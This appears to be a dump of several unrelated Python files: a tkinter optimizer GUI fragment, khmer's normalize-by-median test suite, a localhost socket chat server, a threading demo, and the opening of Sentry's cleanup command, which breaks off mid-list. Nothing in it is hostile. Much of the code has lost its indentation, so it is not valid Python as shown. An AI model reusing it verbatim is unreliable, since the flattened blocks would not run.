Do = Button(window, text = "优化", command = lambda:ThreadTask(Work), width = 10)
Do.place(x = 335, y = 520)
# "推荐" (Recommended) checkbox
def Recommend():
if var[0].get() == 1:
if pageIndex == 1:
for i in range(0,9):
checkButton[i].select()
checkButton[4].deselect()
else:
for i in range((pageIndex - 1) * 9, len(checkButton)):
checkButton[i].select()
else:
for i in range(len(checkButton)):
checkButton[i].deselect()
recommend = Checkbutton(window, text = "推荐", variable = var[0], command = lambda:ThreadTask(Recommend))
recommend.place(x = 50, y = 520)
def CleanGrid():
global checkButton,recommend
recommend.deselect()
for i in range(len(checkButton)):
checkButton[i].deselect()
checkButton[i].grid_forget()
def NextPage(event):
global pageIndex
if pageIndex < pageNum:
pageIndex += 1
CleanGrid()
MainContainer()
def PrevPage(event):
global pageIndex
if pageIndex > 1:
pageIndex -= 1
CleanGrid()
MainContainer()
def PageControl():
    clickLabel = Label(window, text = "下一页")  # "Next page"
    clickLabel2 = Label(window, text = "上一页")  # "Previous page"
    clickLabel.bind('<Button-1>', NextPage)
    clickLabel2.bind('<Button-1>', PrevPage)
    clickLabel.place(x = 695, y = 520)
    clickLabel2.place(x = 625, y = 520)
def Exit():
def JieShu():
window.destroy()
sys.exit(0)
def Hidden():
treasureBox.withdraw()
window.protocol("WM_DELETE_WINDOW", JieShu)
treasureBox.protocol("WM_DELETE_WINDOW", Hidden)
    # Version number label
version = Label(window, text = "版本:3.5.4.4")
version.place(x = 0, y = 575)
def GetFunction2(i):
return treasureBoxFunction[i]
def TreasureBox():
j = 0
for i in range(len(treasureBoxText)):
boxButton.append(Button(treasureBox, text = treasureBoxText[i], height = 2, width = 18, justify = CENTER, wraplength=100, command = GetFunction2(i)))
if round(i / 3) == j:
boxButton[i].grid(row = j, column = i % 3, padx = 50, pady = 20, sticky = W)
else:
boxButton[i].grid(row = j, column = 3, padx = 50, pady = 20, sticky = W)
j += 1
treasureBox.deiconify()
Button(window, text = "百宝箱", command = lambda:ThreadTask(TreasureBox)).place(x = 725, y = 555)
def ThreadTask(task):  # run the task in a background thread so the GUI does not block
    t = Thread(target = task)
    t.daemon = True
    t.start()
if __name__ == "__main__":
Init()
PageControl()
MainContainer()
Exit()
window.mainloop()
|
test_normalize_by_median.py
|
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2015-2016, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
# pylint: disable=missing-docstring,invalid-name
import os
import threading
import io
import shutil
import screed
import khmer
import pytest
from . import khmer_tst_utils as utils
from .test_scripts import _make_counting
def test_normalize_by_median_indent():
infile = utils.get_test_data('paired-mixed.fa.pe')
hashfile = utils.get_test_data('normC20k20.ct')
outfile = utils.get_temp_filename('paired-mixed.fa.pe.keep')
script = 'normalize-by-median.py'
args = ['--loadgraph', hashfile, '-o', outfile, infile]
(status, out, err) = utils.runscript(script, args)
assert status == 0, (out, err)
assert os.path.exists(outfile)
def test_normalize_by_median_loadgraph_with_args():
infile = utils.get_test_data("test-abund-read-2.fa")
tablefile = utils.get_temp_filename("table")
in_dir = os.path.dirname(tablefile)
script = "load-into-counting.py"
args = [tablefile, infile]
(_, _, err) = utils.runscript(script, args)
script = "normalize-by-median.py"
args = ["--ksize", "7", "--loadgraph", tablefile, infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'WARNING: You are loading a saved k-mer countgraph from' in err, err
def test_normalize_by_median_empty_file():
infile = utils.copy_test_data('empty-file')
script = 'normalize-by-median.py'
in_dir = os.path.dirname(infile)
args = [infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'WARNING:' in err, err
assert 'is empty' in err, err
assert 'SKIPPED' in err, err
def test_normalize_by_median():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 98' in err, err
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 1, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert "I/O Errors" not in err
def test_normalize_by_median_quiet():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '--quiet', '-M', '2e6', infile]
(_, out, err) = utils.runscript(script, args, in_dir)
assert len(out) == 0, out
assert len(err) < 460, len(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 1, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert "I/O Errors" not in err
def test_normalize_by_median_unpaired_final_read():
CUTOFF = '1'
infile = utils.copy_test_data('single-read.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-p', infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "ERROR: Unpaired reads when require_paired" in err, err
def test_normalize_by_median_sanity_check_0():
infile = utils.copy_test_data('single-read.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-U', '1024', '--max-mem', '60', infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0, status
assert "recommended false positive ceiling of 0.1!" in err, err
def test_normalize_by_median_sanity_check_1():
infile = utils.copy_test_data('test-filter-abund-Ns.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-U', '83', '--max-tablesize', '17', infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "Warning: The given tablesize is too small!" in err, err
def test_normalize_by_median_sanity_check_2():
infile = utils.copy_test_data('test-filter-abund-Ns.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-U', '83', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert "*** INFO: set memory ceiling automatically." in err, err
assert "*** Ceiling is: 1e+06 bytes" in err, err
def test_normalize_by_median_sanity_check_3():
infile = utils.copy_test_data('test-filter-abund-Ns.fq')
in_dir = os.path.dirname(infile)
tablefile = utils.get_temp_filename('table', in_dir)
script = 'normalize-by-median.py'
args = ['-s', tablefile, '-U', '83', '--fp-rate', '0.7', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert "Overriding default fp 0.1 with new fp: 0.7" in err, err
args = ['--loadgraph', tablefile, '-U', '83', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert "WARNING: You have asked that the graph size be auto" in err, err
assert "NOT be set automatically" in err, err
assert "loading an existing graph" in err, err
def test_normalize_by_median_unforced_badfile():
CUTOFF = '1'
infile = utils.get_temp_filename("potatoes")
outfile = infile + '.keep'
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "ERROR: [Errno 2] No such file or directory:" in err, err
if os.path.exists(outfile):
        assert False, '.keep file should have been removed: ' + outfile
def test_normalize_by_median_contradictory_args():
infile = utils.copy_test_data('test-large.fa')
in_dir = os.path.dirname(infile)
outfile = utils.get_temp_filename('report.out')
script = 'normalize-by-median.py'
args = ['-C', '1', '-k', '17', '--force_single', '-p', '-R',
outfile, infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "cannot both be set" in err, err
def test_normalize_by_median_stdout_3():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile, '--out', '-']
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 98' in err, err
assert 'in block device' in err, err
assert "I/O Errors" not in err
@pytest.mark.known_failing
def test_normalize_by_median_known_good():
CUTOFF = '2'
infile = utils.copy_test_data('100k-filtered.fa.gz')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '20', '-x', '4e6', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
iter_known = screed.open(utils.get_test_data('100k-filtered.fa.keep.gz'))
iter_out = screed.open(outfile)
for rknown, rout in zip(iter_known, iter_out):
assert rknown.name == rout.name
def test_normalize_by_median_report_fp():
# this tests basic reporting of diginorm stats => report.out, including
# a test of aggregate stats for two input files.
infile = utils.copy_test_data("test-abund-read-2.fa")
infile2 = utils.copy_test_data("test-abund-read-2.fa", "copyDataTwo")
in_dir = os.path.dirname(infile)
outfile = utils.get_temp_filename('report.out')
script = 'normalize-by-median.py'
args = ['-C', '1', '-k', '17', '-R', outfile, infile, infile2]
utils.runscript(script, args, in_dir)
assert os.path.exists(outfile)
report = open(outfile, 'r')
line = report.readline().strip()
assert line == 'total,kept,f_kept', line
line = report.readline().strip()
assert line == '1001,1,0.000999', line
line = report.readline().strip()
assert line == '2002,1,0.0004995', line
def test_normalize_by_median_report_fp_hifreq():
# this tests high-frequency reporting of diginorm stats for a single
# file => report.out.
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
outfile = utils.get_temp_filename('report.out')
script = 'normalize-by-median.py'
args = ['-C', '1', '-k', '17', '-R', outfile, infile,
'--report-frequency', '100']
utils.runscript(script, args, in_dir)
assert os.path.exists(outfile)
report = open(outfile, 'r')
line = report.readline().strip()
assert line == 'total,kept,f_kept', line
line = report.readline().strip()
assert line == '100,1,0.01', line
line = report.readline().strip()
assert line == '200,1,0.005', line
@pytest.mark.huge
def test_normalize_by_median_report_fp_huge():
# this tests reporting of diginorm stats => report.out for a large
# file, with the default reporting interval of once every 100k.
infile = utils.copy_test_data('test-large.fa')
in_dir = os.path.dirname(infile)
outfile = utils.get_temp_filename('report.out')
script = 'normalize-by-median.py'
args = ['-C', '1', '-k', '17', '-R', outfile, infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert "fp rate estimated to be 0.623" in err, err
report = open(outfile, 'r')
line = report.readline() # skip header
line = report.readline()
assert "100000,25261,0.2526" in line, line
def test_normalize_by_median_unpaired_and_paired():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-paired.fa')
in_dir = os.path.dirname(infile)
unpairedfile = utils.copy_test_data('random-20-a.fa')
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-u', unpairedfile, '-p', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 4061' in err, err
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
def test_normalize_by_median_count_kmers_PE():
CUTOFF = '1'
infile = utils.copy_test_data('paired_one.base.dif.fa')
in_dir = os.path.dirname(infile)
# The test file has one pair of identical read except for the last base
# The 2nd read should be discarded in the unpaired mode
# but kept in the paired end mode adding only one more unique kmer
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '--force_single', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 98' in err, err
assert 'kept 1 of 2 or 50.0%' in err, err
args = ['-C', CUTOFF, '-k', '17', '-p', infile]
(_, _, err) = utils.runscript(script, args, in_dir)
assert 'Total number of unique k-mers: 99' in err, err
assert 'kept 2 of 2 or 100.0%' in err, err
def test_normalize_by_median_double_file_name():
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = [utils.get_test_data('test-abund-read-2.fa'), infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "Duplicate filename--Cannot handle this!" in err, err
def test_normalize_by_median_stdin_no_out():
infile = utils.get_temp_filename('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ["-"]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert "Accepting input from stdin; output filename" in err, err
def test_normalize_by_median_overwrite():
outfile = utils.copy_test_data('test-abund-read.fa')
in_dir = os.path.dirname(outfile)
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-3.fa')
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-o', outfile, infile]
utils.runscript(script, args, in_dir)
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 1, seqs
assert 'GACAGCgtgCCGCA' in seqs[0], seqs
def test_normalize_by_median_version():
script = 'normalize-by-median.py'
args = ['--version']
_, _, err = utils.runscript(script, args)
errlines = err.splitlines()
for err in errlines:
if err.startswith('||') or \
not err.strip():
continue
break
print(errlines)
print(err)
assert err.startswith('khmer ')
def test_normalize_by_median_2():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 2, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert seqs[1] == 'GGTTGACGGGGCTCAGGG', seqs
def test_normalize_by_median_paired():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-paired.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-p', '-k', '17', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 2, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert seqs[1].startswith('GGTTGACGGGGCTCAGGG'), seqs
def test_normalize_by_median_paired_fq():
CUTOFF = '20'
infile = utils.copy_test_data('test-abund-read-paired.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-p', '-k', '17', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 6, len(seqs)
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
assert seqs[1].startswith('GGTTGACGGGGCTCAGGG'), seqs
names = [r.name for r in screed.open(outfile)]
assert len(names) == 6, names
assert '895:1:37:17593:9954 1::FOO' in names, names
assert '895:1:37:17593:9954 2::FOO' in names, names
def test_normalize_by_median_impaired():
CUTOFF = '1'
infile = utils.copy_test_data('test-abund-read-impaired.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-p', '-k', '17', infile]
status, _, err = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert 'ERROR: Unpaired reads ' in err, err
def test_normalize_by_median_force():
CUTOFF = '1'
corrupt_infile = utils.copy_test_data('test-error-reads.fq')
good_infile = utils.copy_test_data('test-fastq-reads.fq')
in_dir = os.path.dirname(good_infile)
script = 'normalize-by-median.py'
args = ['-f', '-C', CUTOFF, '-k', '17', corrupt_infile, good_infile]
_, _, err = utils.runscript(script, args, in_dir)
assert '*** Skipping' in err
assert '** I/O Errors' in err
def test_normalize_by_median_no_bigcount():
infile = utils.copy_test_data("test-abund-read-2.fa")
hashfile = utils.get_temp_filename('test-out.ct')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
# 256 is outside the range of valid values for C
args = ['-C', '256', '-k 8', '--savegraph', hashfile, infile]
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status == 1, (out, err)
assert "ERROR: khmer only supports 0 <= cutoff < 256" in err
print((out, err))
def test_normalize_by_median_empty():
CUTOFF = '1'
infile = utils.copy_test_data('test-empty.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
def test_normalize_by_median_emptycountgraph():
CUTOFF = '1'
infile = utils.copy_test_data('test-empty.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '--loadgraph', infile, infile]
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert 'ValueError' in err, (status, out, err)
def test_normalize_by_median_fpr():
MAX_TABLESIZE_PARAM = 12
infile = utils.copy_test_data('test-fastq-reads.fq')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-f', '-k 17', '-x ' + str(MAX_TABLESIZE_PARAM), infile]
(status, _, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status != 0
assert os.path.exists(infile + '.keep'), infile
assert '** ERROR: the graph structure is too small' in err, err
def write_by_chunks(infile, outfile, CHUNKSIZE=8192):
ifile = io.open(infile, 'rb')
ofile = io.open(outfile, 'wb')
chunk = ifile.read(CHUNKSIZE)
while len(chunk) > 0:
ofile.write(chunk)
chunk = ifile.read(CHUNKSIZE)
ifile.close()
ofile.close()
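# The streaming tests below pair write_by_chunks with a named FIFO: opening a FIFO blocks
# until it has both a reader and a writer, so the copy runs in a background thread while
# the script under test holds the other end.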
def test_normalize_by_median_streaming_0():
CUTOFF = '20'
infile = utils.get_test_data('100-reads.fq.gz')
in_dir = os.path.dirname(infile)
fifo = utils.get_temp_filename('fifo')
outfile = utils.get_temp_filename('outfile')
# Use a fifo to copy stdout to a file for checking
os.mkfifo(fifo)
thread = threading.Thread(target=write_by_chunks, args=(fifo, outfile))
thread.start()
# Execute diginorm
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-o', fifo, infile]
utils.runscript(script, args, in_dir)
# Merge the thread
thread.join()
assert os.path.exists(outfile), outfile
with open(outfile) as fp:
linecount = sum(1 for _ in fp)
assert linecount == 400
def test_normalize_by_median_streaming_1():
CUTOFF = '20'
infile = utils.get_test_data('test-filter-abund-Ns.fq')
in_dir = os.path.dirname(infile)
fifo = utils.get_temp_filename('fifo')
outfile = utils.get_temp_filename('outfile')
# Use a fifo to copy stdout to a file for checking
os.mkfifo(fifo)
thread = threading.Thread(target=write_by_chunks, args=(infile, fifo))
thread.start()
# Execute diginorm
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '17', '-o', outfile, fifo]
(_, _, err) = utils.runscript(script, args, in_dir)
# Merge the thread
thread.join()
assert os.path.exists(outfile), outfile
assert 'Total number of unique k-mers: 98' in err, err
assert 'fifo is empty' not in err, err
def test_diginorm_basic_functionality_1():
# each of these pairs has both a multicopy sequence ('ACTTCA...') and
# a random sequence. With 'C=1' and '-p', all should be kept.
CUTOFF = ['-C', '1']
PAIRING = ['-p']
infile = utils.copy_test_data('dn-test-all-paired-all-keep.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + list(PAIRING) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1', 'a/2',
'b/1', 'b/2',
'c/1', 'c/2',
'd/1', 'd/2']), seqs
def test_diginorm_basic_functionality_2():
# each of these pairs has both a multicopy sequence ('ACTTCA...')
    # and a random sequence ('G...'). With 'C=1' and '--force_single',
    # only random seqs should be kept, together with one copy
# of the multicopy sequence.
CUTOFF = ['-C', '1']
PAIRING = ['--force_single']
infile = utils.copy_test_data('dn-test-all-paired-all-keep.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + list(PAIRING) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1', 'a/2',
'b/2',
'c/1',
'd/2']), seqs
def test_diginorm_basic_functionality_3():
# This data is entirely unpaired, but with one duplicate ('A...').
# and a random sequence ('G...'). With 'C=1' only three seqs should
# be left, with no other complaints.
CUTOFF = ['-C', '1']
PAIRING = []
infile = utils.copy_test_data('dn-test-none-paired.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + list(PAIRING) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1',
'b/2',
'd/1']), seqs
def test_diginorm_basic_functionality_4():
# This data is mixed paired/unpaired, but with one duplicate ('A...').
# and a random sequence ('G...'). With 'C=2' all of the sequences
# should be kept.
CUTOFF = ['-C', '1']
infile = utils.copy_test_data('dn-test-some-paired-all-keep.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1', 'a/2',
'b/2',
'c/1', 'c/2',
'd/2']), seqs
def test_diginorm_basic_functionality_5():
# each of these pairs has both a multicopy sequence ('ACTTCA...') and
    # a random sequence. With 'C=1' and '-p', all should be kept.
CUTOFF = ['-C', '1']
PAIRING = ['-p']
infile = utils.copy_test_data('dn-test-all-paired-all-keep.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = list(CUTOFF) + list(PAIRING) + ['-k', '15', infile]
_, out, err = utils.runscript(script, args, in_dir)
print(out)
print(err)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = set([r.name for r in screed.open(outfile)])
assert seqs == set(['a/1', 'a/2',
'b/1', 'b/2',
'c/1', 'c/2',
'd/1', 'd/2']), seqs
def test_normalize_by_median_outfile_closed_err():
infile1 = utils.get_test_data('paired-mixed.fa.pe')
infile2 = utils.get_test_data("test-abund-read-2.fa")
outfile = utils.get_temp_filename('outfile_xxx')
script = 'normalize-by-median.py'
args = ['-o', outfile, infile1, infile2]
(status, out, err) = utils.runscript(script, args)
assert status == 0, (out, err)
assert os.path.exists(outfile)
def test_normalize_by_median_long_k():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '33', '-H', 'murmur', infile]
utils.runscript(script, args, in_dir)
outfile = infile + '.keep'
assert os.path.exists(outfile), outfile
seqs = [r.sequence for r in screed.open(outfile)]
assert len(seqs) == 1, seqs
assert seqs[0].startswith('GGTTGACGGGGCTCAGGGGG'), seqs
def test_normalize_by_median_long_k_twobit_fails():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '33', '-H', 'murmur', infile,
'-H', 'twobit-exact']
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status == 1
assert "'twobit-exact' only supports k-mer sizes <= 32" in err
def test_normalize_by_median_long_k_save_fails():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '33', '-H', 'murmur', infile, '-s', 'foo']
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
assert status == 1
assert 'ERROR: cannot save different hash functions yet.' in err
def test_normalize_by_median_long_k_load_fails():
CUTOFF = '2'
infile = utils.copy_test_data('test-abund-read-2.fa')
in_dir = os.path.dirname(infile)
script = 'normalize-by-median.py'
args = ['-C', CUTOFF, '-k', '33', '-H', 'murmur', infile, '-l', 'foo']
(status, out, err) = utils.runscript(script, args, in_dir, fail_ok=True)
print(out)
print(err)
assert status == 1
assert 'ERROR: cannot load different hash functions yet.' in err
|
Server.py
|
import socket
import threading
from tkinter import *
import tkinter.scrolledtext
host = '127.0.0.1'
port = 9090
class Server:
def __init__(self, HOST, PORT):
self.gui_done = False
self.running = True
        gui_threading = threading.Thread(target=self.gui_loop)
        gui_threading.start()
        # Accept the client connection before starting the receive thread,
        # otherwise receive() would run before self.client exists.
        self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server.bind((HOST, PORT))
        self.server.listen()
        self.client, self.address = self.server.accept()
        running_threading = threading.Thread(target=self.receive)
        running_threading.start()
def gui_loop(self):
self.root = Tk()
self.root['background'] = "lightblue"
self.root.geometry('500x630')
self.root.maxsize(500, 630)
self.root.minsize(500, 630)
self.root.title('SecureChat Server - By Ritesh Kr. Gupta')
self.chat_label = Label(self.root, text="CHAT:", bg='lightblue', font=(15,))
self.chat_label.pack(padx=10, pady=5)
self.chat = tkinter.scrolledtext.ScrolledText(self.root)
self.chat.pack(padx=10, pady=5)
        self.chat.config(state='disabled', bg='lightgreen')
self.msg_label = Label(self.root, text='Message: ', bg='lightblue', font=(10,))
self.msg_label.pack(padx=10, pady=5)
self.text = tkinter.Text(self.root, height=3, bg='lightgreen')
self.text.pack(padx=10, pady=5)
self.button = Button(self.root, text='Send', bg='lightpink', width=15, height=1, font=("", 13), relief=SUNKEN,
command=self.send)
self.button.pack(pady=15)
self.gui_done = True
self.root.protocol('WM_DELETE_WINDOW', self.stop)
self.root.mainloop()
def send(self):
if self.gui_done:
message = f"{self.text.get('1.0', 'end')}"
self.chat.config(state='normal')
self.chat.insert('end', "You : " + message)
self.chat.yview('end')
            self.chat.config(state='disabled')
message = "Server: " + message
self.client.send(message.encode('utf-8'))
self.text.delete('1.0', 'end')
def stop(self):
self.running = False
self.root.destroy()
self.server.close()
exit(0)
def receive(self):
while self.running:
try:
message = self.client.recv(1024).decode('utf-8')
if self.gui_done:
self.chat.config(state='normal')
self.chat.insert('end', message)
self.chat.yview('end')
                    self.chat.config(state='disabled')
except ConnectionError:
break
except:
print("Connection Error")
Server(host, port)
|
threading_daemon_join_timeout.py
|
import threading
import time
import logging
def daemon():
logging.debug('Starting')
time.sleep(0.2)
logging.debug('Exiting')
def non_daemon():
logging.debug('Starting')
logging.debug('Exiting')
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
d = threading.Thread(name='daemon', target=daemon, daemon=True)
t = threading.Thread(name='non-daemon', target=non_daemon)
d.start()
t.start()
d.join(0.1)
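# join() returns after the 0.1 second timeout even though the daemon thread is still
# sleeping (it sleeps for 0.2 s), so is_alive() still reports True below.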
print('d.is_alive()', d.is_alive())
t.join()
|
cleanup.py
|
"""
sentry.runner.commands.cleanup
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2015 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
from datetime import timedelta
from uuid import uuid4
import click
from django.utils import timezone
from sentry.runner.decorators import log_options
from six.moves import xrange
# allows services like tagstore to add their own (abstracted) models
# to cleanup
EXTRA_BULK_QUERY_DELETES = []
def get_project(value):
from sentry.models import Project
try:
if value.isdigit():
return int(value)
if '/' not in value:
return None
org, proj = value.split('/', 1)
return Project.objects.get_from_cache(
organization__slug=org,
slug=proj,
).id
except Project.DoesNotExist:
return None
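# For illustration: get_project("42") returns 42; get_project("acme/backend") (a
# hypothetical org/project slug pair) returns that project's id from the cache, or
# None if the value cannot be resolved.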
# We need a unique value to indicate when to stop multiprocessing queue
# an identity on an object() isn't guaranteed to work between parent
# and child proc
_STOP_WORKER = '91650ec271ae4b3e8a67cdc909d80f8c'
def multiprocess_worker(task_queue):
# Configure within each Process
import logging
from sentry.utils.imports import import_string
logger = logging.getLogger('sentry.cleanup')
configured = False
while True:
j = task_queue.get()
if j == _STOP_WORKER:
task_queue.task_done()
return
# On first task, configure Sentry environment
if not configured:
from sentry.runner import configure
configure()
from sentry import models
from sentry import deletions
from sentry import similarity
skip_models = [
# Handled by other parts of cleanup
models.Event,
models.EventMapping,
models.EventAttachment,
models.UserReport,
models.Group,
